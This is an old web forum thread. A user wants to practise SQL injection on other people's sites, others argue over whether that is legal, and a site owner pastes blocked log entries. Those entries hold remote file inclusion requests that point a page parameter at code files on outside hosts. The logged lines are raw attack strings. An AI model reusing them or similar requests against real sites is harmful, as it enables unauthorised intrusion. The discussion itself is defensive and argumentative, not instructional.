Anybody here know how to do SQL injection. I know how to do it its just hard to find a good vulnerable site.

Why would you want to inject someone else's website? It's illegal, and ignorant if you ask me.

Not neccesarily illegal. It is used in many legal ways.

No. SQL injection is gaining access to someones database without their permission. Vulnerabilities are something that isn't supposed to be there, which means you are exploiting their website without their consent. How is that not illegal?

Its illegal if you do something with it. Like deleting a table or the whole database or creating a table. Know what I meen?

No, it's illegal to gain access to something that isn't yours in general.

Look at it this way. The lock on your door isn't that great, and someone enters your house. They might touch some things, but they don't break them. Do you consider that legal?

(Whatever I give up lol.

My site (not my current site, the tests site that I made), got hacked secretly, the hacker didn't attempt to change my password or anything. It was kinda strange that he found an exploit. I bet he did that to other sites.

All he did was creating a thread and put it to hidden said that "blahblahblahblahblahblah".

Care to explain how this was accomplished? I'm hoping this CMS I'm making for my class I'm taking isn't vulnerable.

I checked the log today, very weird over here:
-----------------------------
* 2008-12-21 15:14 **.**.**.*** Security A variable type check failed, expecting 1/INT for 'id' : 81//page.php?id=http://inamsan.kg.kr/emt/id.txt??? - /page.php?id=81//page.php?id=http://inamsan.kg.kr/emt/id.txt???

* 2008-12-21 15:14 **.**.**.*** Security A variable type check failed, expecting 1/INT for 'id' : http://inamsan.kg.kr/emt/id.txt??? - //page.php?id=http://inamsan.kg.kr/emt/id.txt???

* 2008-12-21 15:05 ***.***.***.*** Security A variable type check failed, expecting 1/INT for 'id' : 81" class="searchlinktitle" title="www.igfxdesigns.co.uk/page.php?id=81" onMouseOver="window.status='www.igfxdesigns.co.uk//page.php?id=http://www.acewaste.com.au/content/robo.txt??? - /page.php?id=

* 2008-12-21 15:05 ***.***.***.*** Security A variable type check failed, expecting 1/INT for 'id' : http://www.acewaste.com.au/content/robo.txt??? - //page.php?id=http://www.acewaste.com.au/content/robo.txt???
-----------------------------
Seems like he tried to get userid1's password.

Those are standard hack attempts. I get them all the time. I think everyone does. Good thing they're blocked by Seditio, eh?